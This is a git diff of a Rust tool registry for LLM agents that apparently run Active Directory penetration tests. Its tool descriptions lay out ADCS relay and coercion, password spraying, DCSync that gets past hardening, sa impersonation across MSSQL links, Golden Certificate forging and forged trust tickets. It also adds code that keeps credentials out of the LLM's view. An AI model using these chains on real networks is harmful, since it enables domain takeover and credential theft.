b/ares-llm/src/tool_registry/blue/state.rs @@ -9,7 +9,7 @@ pub(super) fn investigation_state_tool_definitions() -> Vec<ToolDefinition> { vec![ ToolDefinition { name: "add_evidence".into(), - description: "Add a single evidence item to the investigation. For multiple items, prefer add_evidence_batch to record them all in one call.".into(), + description: "Add a single evidence item to the investigation. The `value` MUST be an IOC that appeared in a recent Loki/Prometheus query result (or a MITRE technique ID like T1003.006) — values not seen in observed query data are rejected. For multiple items, prefer add_evidence_batch to record them all in one call.".into(), input_schema: json!({ "type": "object", "properties": { @@ -54,7 +54,7 @@ }, ToolDefinition { name: "add_evidence_batch".into(), - description: "Add multiple evidence items in a single call. Use this instead of calling add_evidence repeatedly — it records all items in one Redis pipeline round-trip and has its own separate call budget.".into(), + description: "Add multiple evidence items in a single call. Each item's `value` MUST be an IOC observed in a recent Loki/Prometheus query (or a MITRE technique ID) — items whose values were not seen in any recorded query result are rejected.
Use this instead of calling add_evidence repeatedly — it records all items in one Redis pipeline round-trip and has its own separate call budget.".into(), input_schema: json!({ "type": "object", "properties": { diff --git a/ares-llm/src/tool_registry/coercion.rs b/ares-llm/src/tool_registry/coercion.rs index 9c295e1a..28836562 100644 --- a/ares-llm/src/tool_registry/coercion.rs +++ b/ares-llm/src/tool_registry/coercion.rs @@ -195,6 +195,49 @@ pub(super) fn tool_definitions() -> Vec { "required": ["target_ip"] }), }, + ToolDefinition { + name: "relay_and_coerce".into(), + description: "Run the full ADCS ESC8 relay+coerce attack as ONE deterministic call. Starts ntlmrelayx targeting the AD CS web enrollment endpoint, then coerces a remote machine to authenticate back: phase 1 attempts unauthenticated PetitPotam (works on unpatched DCs without any creds — preferred); phase 2 falls back to authenticated DFSCoerce (MS-DFSNM); phase 3 falls back to coercer over MS-EFSR → MS-RPRN if creds are supplied. CRITICAL: source ≠ target. coerce_target MUST be a different machine than ca_host — Windows NTLM same-machine loopback protection blocks relay when the coerced host is the relay target. Coerce a DC or other machine and relay it to the CA. The captured certificate is decoded from the relay log and a `certificate_obtained` vulnerability is emitted automatically — `auto_certipy_auth` will then PKINIT and extract the NT hash. Use this instead of orchestrating ntlmrelayx_to_adcs + petitpotam/coercer manually.".into(), + input_schema: json!({ + "type": "object", + "properties": { + "ca_host": { + "type": "string", + "description": "AD CS server IP/hostname running the Certificate Authority web enrollment service (HTTP /certsrv)" + }, + "coerce_target": { + "type": "string", + "description": "Machine to coerce (NOT ca_host — must be a different host). Its machine account is what the relay will impersonate. Typically a DC's IP/hostname; in cross-forest scenarios any reachable machine in the target's RPC scope works." + }, + "attacker_ip": { + "type": "string", + "description": "Local listener IP that the coerced machine will authenticate to" + }, + "coerce_user": { + "type": "string", + "description": "Optional username for authenticated coercer fallback (only needed if unauth PetitPotam is patched; cross-forest: child user with RPC access)" + }, + "coerce_password": { + "type": "string", + "description": "Password for coerce_user (provide either coerce_password OR coerce_hash; only required if coerce_user is set)" + }, + "coerce_hash": { + "type": "string", + "description": "NT hash for coerce_user (provide either coerce_password OR coerce_hash; only required if coerce_user is set)" + }, + "coerce_domain": { + "type": "string", + "description": "Domain for coerce_user (the user's home realm, may differ from coerce_target's realm; only required if coerce_user is set)" + }, + "template": { + "type": "string", + "description": "Certificate template to request (default: DomainController)", + "default": "DomainController" + } + }, + "required": ["ca_host", "coerce_target", "attacker_ip"] + }), + }, ToolDefinition { name: "ntlmrelayx_multirelay".into(), description: "Relay captured NTLM authentication to multiple SMB targets simultaneously. 
Attempts to dump SAM database hashes from each target where the relayed account has local administrator privileges.".into(), diff --git a/ares-llm/src/tool_registry/credential_access/netexec_tools.rs b/ares-llm/src/tool_registry/credential_access/netexec_tools.rs index 977f1de4..47360028 100644 --- a/ares-llm/src/tool_registry/credential_access/netexec_tools.rs +++ b/ares-llm/src/tool_registry/credential_access/netexec_tools.rs @@ -53,7 +53,11 @@ pub fn definitions() -> Vec { }, "password": { "type": "string", - "description": "Password to spray" + "description": "Single candidate password to spray across all users (e.g. 'Welcome1'). Either this OR `use_common_passwords` must be set." + }, + "use_common_passwords": { + "type": "boolean", + "description": "If true, spray a built-in list of common passwords instead of a single candidate. Mutually exclusive with `password`." }, "domain": { "type": "string", @@ -74,9 +78,13 @@ pub fn definitions() -> Vec { "acknowledge_no_policy": { "type": "boolean", "description": "Override that allows spraying without lockout_threshold. Use only when password_policy cannot be retrieved; lockouts are likely." + }, + "excluded_users": { + "type": "string", + "description": "Comma-separated usernames to drop from the wordlist before spraying. Use this with the quarantine list provided in the task payload to avoid re-locking already-locked accounts." } }, - "required": ["target", "password", "domain"] + "required": ["target", "domain"] }), }, ToolDefinition { @@ -96,11 +104,41 @@ pub fn definitions() -> Vec { "domain": { "type": "string", "description": "Target domain name" + }, + "excluded_users": { + "type": "string", + "description": "Comma-separated usernames to drop from the wordlist before spraying. Use this with the quarantine list provided in the task payload to avoid re-locking already-locked accounts." } }, "required": ["target", "domain"] }), }, + ToolDefinition { + name: "smb_login_check".into(), + description: "Validate a single credential against a target via SMB. Use this to verify that a credential works before attempting more complex attacks.".into(), + input_schema: json!({ + "type": "object", + "properties": { + "target": { + "type": "string", + "description": "Target IP address or hostname" + }, + "username": { + "type": "string", + "description": "Username to authenticate with" + }, + "password": { + "type": "string", + "description": "Password to authenticate with" + }, + "domain": { + "type": "string", + "description": "Target domain name" + } + }, + "required": ["target", "username", "password", "domain"] + }), + }, ToolDefinition { name: "gpp_password_finder".into(), description: "Search Group Policy Preferences for credentials (cpassword). Finds GPP XML files in SYSVOL containing encrypted passwords that can be trivially decrypted.".into(), diff --git a/ares-llm/src/tool_registry/credential_access/secretsdump.rs b/ares-llm/src/tool_registry/credential_access/secretsdump.rs index b89b45e8..2e7d754f 100644 --- a/ares-llm/src/tool_registry/credential_access/secretsdump.rs +++ b/ares-llm/src/tool_registry/credential_access/secretsdump.rs @@ -43,6 +43,14 @@ pub fn definitions() -> Vec { "type": "string", "description": "Path to Kerberos ccache ticket file for authentication" }, + "just_dc_user": { + "type": "string", + "description": "Restrict DCSync to a single account (e.g. 'krbtgt' or 'Administrator'). Bypasses 'SPN target name validation' / DRSUAPI hardening that blocks full dumps." 
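Before the schema continues, a sketch of the fallback ladder these two new arguments enable; the JSON mirrors tool-call arguments an agent might emit (target and principal values are illustrative):

```rust
use serde_json::json;

fn main() {
    // When a full DCSync dies on DRSUAPI hardening:
    // step 1: narrow the dump to a single principal,
    let targeted = json!({
        "target": "192.168.58.10",
        "username": "Administrator",
        "domain": "contoso.local",
        "just_dc_user": "krbtgt"
    });
    // step 2: if replication is blocked outright, switch to VSS extraction.
    let vss = json!({
        "target": "192.168.58.10",
        "username": "Administrator",
        "domain": "contoso.local",
        "use_vss": true
    });
    assert!(targeted["just_dc_user"].is_string());
    assert!(vss["use_vss"].as_bool().unwrap());
}
```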
+ }, + "use_vss": { + "type": "boolean", + "description": "Use VSS shadow-copy extraction instead of DRSUAPI. Falls back when DRSUAPI is hardened." + }, "timeout_minutes": { "type": "integer", "description": "Overall operation timeout in minutes (default: 3)", diff --git a/ares-llm/src/tool_registry/lateral/execution.rs b/ares-llm/src/tool_registry/lateral/execution.rs index e8364d2c..56a94d47 100644 --- a/ares-llm/src/tool_registry/lateral/execution.rs +++ b/ares-llm/src/tool_registry/lateral/execution.rs @@ -416,6 +416,14 @@ "type": "string", "description": "Target IP address (if different from hostname resolution)" }, + "just_dc_user": { + "type": "string", + "description": "Restrict DCSync to a single account (e.g. 'krbtgt' or 'Administrator'). Bypasses 'SPN target name validation' / DRSUAPI hardening blocking full dumps." + }, + "use_vss": { + "type": "boolean", + "description": "Use VSS shadow-copy method instead of DRSUAPI replication. Falls back when DRSUAPI is restricted by domain hardening." + }, "timeout_minutes": { "type": "integer", "description": "Maximum time in minutes before aborting the dump", @@ -464,6 +472,14 @@ pub fn secretsdump_kerberos_definition() -> Vec<ToolDefinition> { "type": "string", "description": "Target IP address (if different from hostname resolution)" }, + "just_dc_user": { + "type": "string", + "description": "Restrict DCSync to a single account (e.g. 'krbtgt' or 'Administrator'). Bypasses 'SPN target name validation' / DRSUAPI hardening blocking full dumps." + }, + "use_vss": { + "type": "boolean", + "description": "Use VSS shadow-copy method instead of DRSUAPI replication. Falls back when DRSUAPI is restricted by domain hardening." + }, "timeout_minutes": { "type": "integer", "description": "Maximum time in minutes before aborting the dump", diff --git a/ares-llm/src/tool_registry/lateral/mssql.rs b/ares-llm/src/tool_registry/lateral/mssql.rs index 0b32a043..e9e3b94d 100644 --- a/ares-llm/src/tool_registry/lateral/mssql.rs +++ b/ares-llm/src/tool_registry/lateral/mssql.rs @@ -194,8 +194,12 @@ }, ToolDefinition { name: "mssql_exec_linked".into(), - description: "Execute SQL queries on a linked MSSQL server via OPENQUERY. \ - Enables lateral movement through SQL Server linked server chains." + description: "Execute SQL queries on a linked MSSQL server via `EXEC ('...') AT \ + [link]` (RPC OUT). The hop runs as the connecting user's mapped credential, \ + which fails on cross-forest links without Kerberos delegation. For cross-forest \ + pivots: pass `impersonate_user='sa'` to wrap the hop in EXECUTE AS LOGIN \ + (uses the local SeImpersonate path), or use `mssql_openquery` to ride the \ + linked server's stored login mapping." .into(), input_schema: json!({ "type": "object", "properties": { @@ -228,6 +232,58 @@ "type": "boolean", "description": "Use Windows authentication instead of SQL auth", "default": true + }, + "impersonate_user": { + "type": "string", + "description": "Optional source-side login to impersonate before the hop (EXECUTE AS LOGIN). Use 'sa' to break out of double-hop limits when the local connection has IMPERSONATE on sa." + } + }, + "required": ["target", "username", "password", "linked_server", "query"] + }), + }, + ToolDefinition { + name: "mssql_openquery".into(), + description: "Query a linked MSSQL server via OPENQUERY using the linked server's \ + configured remote login (sp_addlinkedsrvlogin).
Bypasses Kerberos double-hop \ + — use this when `mssql_exec_linked` fails on cross-forest links because the \ + connecting principal can't delegate, but the linked server has a stored \ + credential mapping (RPC OUT + sp_addlinkedsrvlogin)." + .into(), + input_schema: json!({ + "type": "object", + "properties": { + "target": { + "type": "string", + "description": "MSSQL server IP or hostname (entry point)" + }, + "username": { + "type": "string", + "description": "Username for authentication" + }, + "password": { + "type": "string", + "description": "Password for authentication" + }, + "linked_server": { + "type": "string", + "description": "Name of the linked server to query" + }, + "query": { + "type": "string", + "description": "SQL query string passed inside OPENQUERY (single quotes auto-escaped)" + }, + "domain": { + "type": "string", + "description": "Domain name for Windows authentication" + }, + "windows_auth": { + "type": "boolean", + "description": "Use Windows authentication instead of SQL auth", + "default": true + }, + "impersonate_user": { + "type": "string", + "description": "Optional source-side login to impersonate before OPENQUERY (e.g. 'sa') for IMPERSONATE-based escalation." } }, "required": ["target", "username", "password", "linked_server", "query"] @@ -236,7 +292,8 @@ pub fn definitions() -> Vec { ToolDefinition { name: "mssql_linked_enable_xpcmdshell".into(), description: "Enable xp_cmdshell on a linked MSSQL server. Required before \ - executing OS commands on the linked server." + executing OS commands on the linked server. Pass `impersonate_user='sa'` \ + for cross-forest hops where the connecting principal lacks delegation." .into(), input_schema: json!({ "type": "object", @@ -265,6 +322,10 @@ pub fn definitions() -> Vec { "type": "boolean", "description": "Use Windows authentication instead of SQL auth", "default": true + }, + "impersonate_user": { + "type": "string", + "description": "Optional source-side login to impersonate (EXECUTE AS LOGIN) before the hop." } }, "required": ["target", "username", "password", "linked_server"] @@ -273,7 +334,9 @@ pub fn definitions() -> Vec { ToolDefinition { name: "mssql_linked_xpcmdshell".into(), description: "Execute an OS command via xp_cmdshell on a linked MSSQL server. \ - Requires xp_cmdshell to be enabled on the linked server first." + Requires xp_cmdshell to be enabled on the linked server first. Pass \ + `impersonate_user='sa'` for cross-forest hops where the connecting \ + principal can't double-hop." .into(), input_schema: json!({ "type": "object", @@ -306,6 +369,10 @@ pub fn definitions() -> Vec { "type": "boolean", "description": "Use Windows authentication instead of SQL auth", "default": true + }, + "impersonate_user": { + "type": "string", + "description": "Optional source-side login to impersonate (EXECUTE AS LOGIN) before the hop." } }, "required": ["target", "username", "password", "linked_server", "command"] diff --git a/ares-llm/src/tool_registry/mod.rs b/ares-llm/src/tool_registry/mod.rs index b2fa2573..ee7640f2 100644 --- a/ares-llm/src/tool_registry/mod.rs +++ b/ares-llm/src/tool_registry/mod.rs @@ -104,6 +104,102 @@ pub fn is_callback_tool(name: &str) -> bool { CALLBACK_TOOLS.contains(&name) } +/// JSON schema property keys that contain secret material. +/// +/// These are stripped from every tool's `input_schema` before tool definitions +/// are sent to the LLM. 
The LLM names principals (`username`, `domain`); the +/// worker's credential resolver injects secrets from harvested operation state +/// at dispatch time. +/// +/// Keep this in lock-step with `ares-cli/src/worker/credential_resolver.rs::CREDENTIAL_KEYS`. +pub const SECRET_SCHEMA_KEYS: &[&str] = &[ + "password", + "hash", + "nt_hash", + "ntlm_hash", + "aes_key", + "aes256_key", + "ticket_path", + "krbtgt_hash", + "child_krbtgt_hash", + "parent_krbtgt_hash", + "trust_key", + "trust_aes_key", + "trust_hash", + "admin_hash", + "coerce_password", + "coerce_hash", + "domain_sid", + "source_sid", + "target_sid", + "extra_sid", + "kerberos_keys", +]; + +/// Names of callback tools whose `password` / `hash` arguments are part of the +/// callback contract (e.g. tools that record harvested credentials). These are +/// exempt from secret-stripping. +const CALLBACK_NAMES_WITH_SECRETS: &[&str] = &[ + "list_credentials", + "get_credential_summary", + "get_hash_summary", + "get_all_credentials", + "get_all_hashes", + "get_hash_value", +]; + +/// Per-tool exposed-key exemptions. For tools where a "secret-shaped" argument +/// is actually input *data* (e.g. `password_spray.password` is the candidate +/// password to spray, not a credential to look up), the named keys remain in +/// the LLM-visible schema. The credential resolver will not inject anything +/// for these keys because the calls have no `(username, domain)` principal. +fn exposed_secret_keys(tool_name: &str) -> &'static [&'static str] { + match tool_name { + "password_spray" => &["password"], + _ => &[], + } +} + +/// Strip every secret-bearing property from a tool's input schema. +/// +/// Mutates `input_schema.properties` to remove keys in `SECRET_SCHEMA_KEYS`, +/// and prunes those keys from the `required[]` array. The LLM never sees a +/// slot for them — except for keys explicitly exposed by `exposed_secret_keys` +/// for tools where the argument represents input data rather than a credential. +fn strip_secret_fields(tool: &mut ToolDefinition) { + if CALLBACK_NAMES_WITH_SECRETS.contains(&tool.name.as_str()) { + return; + } + let Some(obj) = tool.input_schema.as_object_mut() else { + return; + }; + + let exposed = exposed_secret_keys(&tool.name); + + if let Some(props) = obj.get_mut("properties").and_then(|v| v.as_object_mut()) { + for key in SECRET_SCHEMA_KEYS { + if exposed.contains(key) { + continue; + } + props.remove(*key); + } + } + + if let Some(req) = obj.get_mut("required").and_then(|v| v.as_array_mut()) { + req.retain(|v| match v.as_str() { + Some(s) => exposed.contains(&s) || !SECRET_SCHEMA_KEYS.contains(&s), + None => true, + }); + } +} + +/// Apply `strip_secret_fields` to every tool in a definitions list. +fn strip_secrets_from_all(tools: &mut [ToolDefinition]) { + for tool in tools.iter_mut() { + strip_secret_fields(tool); + } +} + fn callback_tool_definitions() -> Vec { vec![ ToolDefinition { @@ -217,6 +313,10 @@ pub fn tools_for_role(role: AgentRole) -> Vec { tools.extend(reporting::tool_definitions()); tools.extend(callback_tool_definitions()); + // Strip credential fields from every tool schema. The LLM names principals; + // the worker's credential_resolver injects secrets at dispatch time. + strip_secrets_from_all(&mut tools); + tools } @@ -251,6 +351,10 @@ pub fn tools_for_capabilities(capabilities: &[String]) -> Vec { // Always include reporting + callback tools matched.extend(reporting::tool_definitions()); matched.extend(callback_tool_definitions()); + + // Strip credential fields — see tools_for_role. 
+ strip_secrets_from_all(&mut matched); + matched } @@ -285,6 +389,92 @@ mod tests { assert!(!is_callback_tool("secretsdump")); } + #[test] + fn no_secret_fields_in_any_role_schema() { + for role in [ + AgentRole::Recon, + AgentRole::CredentialAccess, + AgentRole::Cracker, + AgentRole::Acl, + AgentRole::Privesc, + AgentRole::Lateral, + AgentRole::Coercion, + AgentRole::Orchestrator, + ] { + let tools = tools_for_role(role); + for tool in &tools { + if CALLBACK_NAMES_WITH_SECRETS.contains(&tool.name.as_str()) { + continue; + } + let exposed = exposed_secret_keys(&tool.name); + let props = tool + .input_schema + .get("properties") + .and_then(|v| v.as_object()); + if let Some(props) = props { + for key in SECRET_SCHEMA_KEYS { + if exposed.contains(key) { + continue; + } + assert!( + !props.contains_key(*key), + "Tool '{}' (role {:?}) leaks secret field '{}' to LLM", + tool.name, + role, + key + ); + } + } + let req = tool.input_schema.get("required").and_then(|v| v.as_array()); + if let Some(req) = req { + for v in req { + if let Some(s) = v.as_str() { + assert!( + exposed.contains(&s) || !SECRET_SCHEMA_KEYS.contains(&s), + "Tool '{}' (role {:?}) requires secret field '{}'", + tool.name, + role, + s + ); + } + } + } + } + } + } + + #[test] + fn no_secret_fields_in_capability_schemas() { + let caps: Vec = ["psexec", "secretsdump", "generate_golden_ticket"] + .iter() + .map(|s| s.to_string()) + .collect(); + let tools = tools_for_capabilities(&caps); + for tool in &tools { + if CALLBACK_NAMES_WITH_SECRETS.contains(&tool.name.as_str()) { + continue; + } + let exposed = exposed_secret_keys(&tool.name); + if let Some(props) = tool + .input_schema + .get("properties") + .and_then(|v| v.as_object()) + { + for key in SECRET_SCHEMA_KEYS { + if exposed.contains(key) { + continue; + } + assert!( + !props.contains_key(*key), + "Capability tool '{}' leaks secret field '{}' to LLM", + tool.name, + key + ); + } + } + } + } + #[test] fn tool_schemas_valid_json() { for role in [ @@ -560,6 +750,10 @@ mod tests { } } + // ----------------------------------------------------------------------- + // Blue team tool registry tests + // ----------------------------------------------------------------------- + #[cfg(feature = "blue")] mod blue_tests { use crate::tool_registry::blue::{ diff --git a/ares-llm/src/tool_registry/privesc/adcs.rs b/ares-llm/src/tool_registry/privesc/adcs.rs index 3f09edc1..5b53e517 100644 --- a/ares-llm/src/tool_registry/privesc/adcs.rs +++ b/ares-llm/src/tool_registry/privesc/adcs.rs @@ -10,7 +10,7 @@ pub fn definitions() -> Vec { name: "certipy_find".into(), description: "Find vulnerable certificate templates in Active Directory Certificate \ Services (AD CS). Enumerates CAs, templates, and identifies exploitable \ - misconfigurations (ESC1-ESC8)." + misconfigurations (ESC1-ESC15)." .into(), input_schema: json!({ "type": "object", @@ -31,13 +31,17 @@ pub fn definitions() -> Vec { "type": "string", "description": "Domain controller IP address" }, + "hashes": { + "type": "string", + "description": "NTLM hash for pass-the-hash (format: 'lmhash:nthash' or just ':nthash'). Use instead of password." + }, "vulnerable": { "type": "boolean", "description": "Only show vulnerable templates. Defaults to true.", "default": true } }, - "required": ["domain", "username", "password", "dc_ip"] + "required": ["domain", "username", "dc_ip"] }), }, ToolDefinition { @@ -77,6 +81,22 @@ pub fn definitions() -> Vec { "type": "string", "description": "User Principal Name to request the certificate for. 
Defaults to Administrator.", "default": "Administrator" + }, + "target": { + "type": "string", + "description": "CA server IP or hostname to connect to for certificate enrollment. REQUIRED when the CA is on a different host than the DC (e.g. CA on a member server, DC on the domain controller). Without this, certipy tries RPC on the DC which fails with ept_s_not_registered." + }, + "sid": { + "type": "string", + "description": "Object SID to embed in the certificate (e.g. 'S-1-5-21-...-500' for Administrator). Required by certipy v5+ to prevent SID mismatch errors during certipy_auth. For Administrator, use the domain SID + '-500'." + }, + "out": { + "type": "string", + "description": "Output filename for the PFX certificate (without .pfx extension). A unique name is auto-generated if not specified. The resulting file will be .pfx — use this path for certipy_auth's pfx_path parameter." + }, + "application_policies": { + "type": "string", + "description": "Application policy OID to include in the certificate request. Used for ESC15 (CVE-2024-49019) exploitation where the template uses application policy OIDs for authorization." } }, "required": ["domain", "username", "password", "dc_ip", "ca", "template"] @@ -111,7 +131,8 @@ pub fn definitions() -> Vec { name: "certipy_shadow".into(), description: "Exploit Shadow Credentials by adding a Key Credential to a target \ account's msDS-KeyCredentialLink attribute via Certipy, then authenticating \ - with the resulting certificate." + with the resulting certificate. Provide either `password` or `hashes` for \ + authentication." .into(), input_schema: json!({ "type": "object", @@ -126,7 +147,11 @@ pub fn definitions() -> Vec { }, "password": { "type": "string", - "description": "Password for authentication" + "description": "Password for authentication. Optional if `hashes` is provided." + }, + "hashes": { + "type": "string", + "description": "NTLM hash for pass-the-hash (format: 'lmhash:nthash' or just ':nthash'). Use instead of password." }, "dc_ip": { "type": "string", @@ -137,7 +162,7 @@ pub fn definitions() -> Vec { "description": "Target account to add shadow credentials to" } }, - "required": ["domain", "username", "password", "dc_ip", "target"] + "required": ["domain", "username", "dc_ip", "target"] }), }, ToolDefinition { @@ -210,10 +235,207 @@ pub fn definitions() -> Vec { "type": "string", "description": "UPN of the target user to impersonate. Defaults to Administrator.", "default": "Administrator" + }, + "target": { + "type": "string", + "description": "CA server IP or hostname for certificate enrollment. REQUIRED when the CA is on a different host than the DC." } }, "required": ["domain", "username", "password", "dc_ip", "template", "ca"] }), }, + ToolDefinition { + name: "certipy_ca".into(), + description: + "Manage a Certificate Authority using Certipy. Can add yourself as a \ + CA officer (ManageCA right required), issue a pending certificate request, or \ + back up the CA's private key + certificate (requires SYSTEM/local admin on the \ + CA host — produces a PFX usable for offline certificate forgery via certipy_forge)." + .into(), + input_schema: json!({ + "type": "object", + "properties": { + "domain": { + "type": "string", + "description": "Target domain (e.g. 
contoso.local)" + }, + "username": { + "type": "string", + "description": "Username for authentication (must have ManageCA rights)" + }, + "password": { + "type": "string", + "description": "Password for authentication" + }, + "dc_ip": { + "type": "string", + "description": "Domain controller IP address" + }, + "ca": { + "type": "string", + "description": "Certificate Authority name (e.g. 'CONTOSO-CA')" + }, + "add_officer": { + "type": "boolean", + "description": "Add yourself as a CA officer. Requires ManageCA rights." + }, + "issue_request": { + "type": "integer", + "description": "Issue (approve) a pending certificate request by its request ID." + }, + "backup": { + "type": "boolean", + "description": "Back up the CA private key + certificate to a PFX. Requires SYSTEM or local admin on the CA host (use the credential of an account with that access). Output PFX is the input to certipy_forge for offline Golden Certificate forgery." + } + }, + "required": ["domain", "username", "password", "dc_ip", "ca"] + }), + }, + ToolDefinition { + name: "certipy_forge".into(), + description: "Forge a certificate offline using a CA's backed-up private key (Golden \ + Certificate). Use after certipy_ca with backup=true to produce a PFX for any UPN \ + in the CA's domain — bypasses normal enrollment, no DC interaction. The forged \ + PFX feeds certipy_auth to obtain the target user's NT hash via PKINIT." + .into(), + input_schema: json!({ + "type": "object", + "properties": { + "ca_pfx": { + "type": "string", + "description": "Path to the CA's backed-up PFX file (produced by certipy_ca with backup=true)." + }, + "upn": { + "type": "string", + "description": "User Principal Name to forge the certificate for (e.g. 'administrator@contoso.local'). Used as the certificate subject for PKINIT authentication." + }, + "subject": { + "type": "string", + "description": "Optional certificate subject (Distinguished Name). Defaults to a sensible value derived from the UPN." + }, + "template": { + "type": "string", + "description": "Optional certificate template name to mimic. Defaults to a generic client-auth template." + }, + "out": { + "type": "string", + "description": "Output filename for the forged PFX. Auto-generated if omitted (forged__.pfx)." + } + }, + "required": ["ca_pfx", "upn"] + }), + }, + ToolDefinition { + name: "certipy_retrieve".into(), + description: "Retrieve a previously issued certificate from the CA by its request ID. \ + Used after certipy_ca -issue-request approves a pending request." + .into(), + input_schema: json!({ + "type": "object", + "properties": { + "domain": { + "type": "string", + "description": "Target domain (e.g. contoso.local)" + }, + "username": { + "type": "string", + "description": "Username for authentication" + }, + "password": { + "type": "string", + "description": "Password for authentication" + }, + "dc_ip": { + "type": "string", + "description": "Domain controller IP address" + }, + "ca": { + "type": "string", + "description": "Certificate Authority name" + }, + "request_id": { + "type": "integer", + "description": "The certificate request ID to retrieve" + }, + "target": { + "type": "string", + "description": "CA server IP or hostname for RPC enrollment" + } + }, + "required": ["domain", "username", "password", "dc_ip", "ca", "request_id"] + }), + }, + ToolDefinition { + name: "certipy_relay".into(), + description: "Start a Certipy relay listener for ADCS certificate enrollment via \ + relay attacks. Supports HTTP relay (ESC8) and RPC relay (ESC11). 
\ + For ESC8: target=http://ca-host. For ESC11: target=rpc://ca-host." + .into(), + input_schema: json!({ + "type": "object", + "properties": { + "target": { + "type": "string", + "description": "Relay target URL. Use 'http://' for ESC8 (HTTP web enrollment relay) or 'rpc://' for ESC11 (RPC certificate enrollment relay)." + }, + "ca": { + "type": "string", + "description": "Certificate Authority name (e.g. 'CONTOSO-CA')" + }, + "template": { + "type": "string", + "description": "Certificate template to request during relay. Optional — defaults to Machine for HTTP or uses the CA's default." + } + }, + "required": ["target", "ca"] + }), + }, + ToolDefinition { + name: "certipy_esc7_full_chain".into(), + description: "Execute the full ESC7 exploit chain: add yourself as CA officer \ + (ManageCA abuse), request a SubCA certificate (gets denied), issue the pending \ + request, retrieve the certificate, and authenticate to obtain NT hashes. \ + Requires the user to have ManageCA rights on the target CA." + .into(), + input_schema: json!({ + "type": "object", + "properties": { + "domain": { + "type": "string", + "description": "Target domain (e.g. contoso.local)" + }, + "username": { + "type": "string", + "description": "Username for authentication (must have ManageCA rights)" + }, + "password": { + "type": "string", + "description": "Password for authentication" + }, + "dc_ip": { + "type": "string", + "description": "Domain controller IP address" + }, + "ca": { + "type": "string", + "description": "Certificate Authority name (e.g. 'CONTOSO-CA')" + }, + "target": { + "type": "string", + "description": "CA server IP or hostname for certificate enrollment. REQUIRED when the CA is on a different host than the DC." + }, + "upn": { + "type": "string", + "description": "UPN of the user to impersonate. Defaults to 'administrator@'.", + "default": "administrator" + }, + "sid": { + "type": "string", + "description": "SID to embed in the certificate (e.g. domain SID + '-500' for Administrator)" + } + }, + "required": ["domain", "username", "password", "dc_ip", "ca"] + }), + }, ] } diff --git a/ares-llm/src/tool_registry/privesc/tickets.rs b/ares-llm/src/tool_registry/privesc/tickets.rs index 47666a60..ccb6ff4f 100644 --- a/ares-llm/src/tool_registry/privesc/tickets.rs +++ b/ares-llm/src/tool_registry/privesc/tickets.rs @@ -64,10 +64,6 @@ pub fn definitions() -> Vec { "hash": { "type": "string", "description": "NTLM hash for pass-the-hash authentication (e.g. aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0). Use this OR password." - }, - "target_domain": { - "type": "string", - "description": "Parent domain FQDN (auto-detected from child if omitted)" } }, "required": ["child_domain", "username"] @@ -92,7 +88,11 @@ pub fn definitions() -> Vec { }, "password": { "type": "string", - "description": "Password for authentication" + "description": "Password for authentication (use this OR hash, must be non-empty)" + }, + "hash": { + "type": "string", + "description": "NTLM hash for pass-the-hash authentication (LM:NT or NT-only). Use this OR password." }, "dc_ip": { "type": "string", @@ -103,7 +103,7 @@ pub fn definitions() -> Vec { "description": "The trusted domain to extract the trust key for (e.g. fabrikam.local)" } }, - "required": ["domain", "username", "password", "dc_ip", "trusted_domain"] + "required": ["domain", "username", "dc_ip", "trusted_domain"] }), }, ToolDefinition { @@ -140,6 +140,14 @@ pub fn definitions() -> Vec { "description": "Username to embed in the ticket. 
Defaults to Administrator.", "default": "Administrator" }, + "extra_sid": { + "type": "string", + "description": "Extra SID to embed (e.g. '-519' for Enterprise Admins). Use for child-to-parent escalation within the same forest. OMIT for cross-forest trusts — SID filtering blocks RIDs < 1000." + }, + "aes_key": { + "type": "string", + "description": "AES256 trust key (hex, 64 chars). REQUIRED for Windows Server 2016+ target DCs — RC4-only inter-realm tickets are rejected with KDC_ERR_TGT_REVOKED. Extract alongside the NT hash via extract_trust_key (look for ':aes256-cts-hmac-sha1-96:' line)." + }, "duration": { "type": "integer", "description": "Ticket duration in days. Defaults to 3650.", diff --git a/ares-llm/src/tool_registry/recon.rs b/ares-llm/src/tool_registry/recon.rs index 3105f70b..e7b1f4cd 100644 --- a/ares-llm/src/tool_registry/recon.rs +++ b/ares-llm/src/tool_registry/recon.rs @@ -117,18 +117,22 @@ pub(super) fn tool_definitions() -> Vec { }, ToolDefinition { name: "ldap_search".into(), - description: "Execute an LDAP search query against a domain controller.".into(), + description: "Execute an LDAP search query against a domain controller. When authenticating with credentials from a different domain (e.g. child domain cred against parent DC), set bind_domain to the credential's domain.".into(), input_schema: json!({ "type": "object", "properties": { "target": {"type": "string", "description": "DC IP or hostname"}, - "domain": {"type": "string"}, + "domain": {"type": "string", "description": "Target domain (used for LDAP base DN)"}, "username": {"type": "string"}, "password": {"type": "string"}, "filter": {"type": "string", "description": "LDAP filter (e.g. '(objectClass=user)')"}, "attributes": { "type": "string", "description": "Comma-separated attributes to retrieve" + }, + "bind_domain": { + "type": "string", + "description": "Domain for LDAP bind DN (user@bind_domain). Use when credential domain differs from target domain (e.g. child-domain cred authenticating to parent DC). If omitted, uses 'domain'." } }, "required": ["target", "domain", "filter"] @@ -136,15 +140,16 @@ pub(super) fn tool_definitions() -> Vec { }, ToolDefinition { name: "rpcclient_command".into(), - description: "Execute an rpcclient command against a target.".into(), + description: "Execute an rpcclient command against a target. Supports pass-the-hash via the 'hash' parameter.".into(), input_schema: json!({ "type": "object", "properties": { "target": {"type": "string"}, - "command": {"type": "string", "description": "rpcclient command (e.g. 'enumdomusers')"}, + "command": {"type": "string", "description": "rpcclient command (e.g. 'enumdomusers', 'enumdomgroups', 'querygroupmem ')"}, "username": {"type": "string"}, "password": {"type": "string"}, - "domain": {"type": "string"} + "domain": {"type": "string"}, + "hash": {"type": "string", "description": "NTLM hash for pass-the-hash authentication (use instead of password)"} }, "required": ["target", "command"] }), @@ -256,5 +261,24 @@ pub(super) fn tool_definitions() -> Vec { "required": ["target"] }), }, + ToolDefinition { + name: "ldap_acl_enumeration".into(), + description: "Enumerate ACL attack paths by querying nTSecurityDescriptor attributes on AD objects. Identifies dangerous ACEs (GenericAll, WriteDacl, ForceChangePassword, GenericWrite, WriteOwner, Self-Membership) that can be exploited for privilege escalation. 
